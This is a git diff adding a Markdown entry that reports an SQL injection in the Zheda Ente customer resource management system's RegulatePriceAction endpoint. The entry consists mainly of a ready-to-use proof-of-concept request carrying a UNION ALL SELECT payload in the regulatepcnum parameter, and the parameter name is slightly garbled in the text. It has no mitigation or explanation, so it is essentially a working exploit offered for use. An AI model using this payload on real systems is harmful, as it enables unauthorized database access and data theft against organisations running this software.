diff --git a/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md b/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md new file mode 100644 index 0000000..fa583eb --- /dev/null +++ b/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md @@ -0,0 +1,7 @@ +## 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入 + +## poc +``` +/entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist®ulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,111*111--+aaaa + +```